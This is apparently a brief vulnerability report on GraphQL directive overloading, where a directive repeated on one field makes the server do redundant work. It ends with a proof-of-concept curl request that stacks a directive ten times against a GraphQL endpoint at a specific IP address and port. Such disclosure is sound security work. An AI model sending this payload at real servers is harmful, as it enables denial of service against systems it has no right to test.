Graphql Directive Overloading Vulnerability #543
Description
summary
GraphQL allows the same instruction to be applied multiple times at the same location. The server will execute the corresponding processing logic for each instance of the instruction. This can lead to exhaustion of computing resources.
POC
curl -X POST -H "User-Agent: oxpecker" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -H "Content-Length: 92" -H "Content-Type: application/json" -d '{"query": "query cop { __typename @aa@aa@aa@aa@aa@aa@aa@aa@aa@aa }", "operationName": "cop"}' 'http://34.127.101.91:40410/graphql'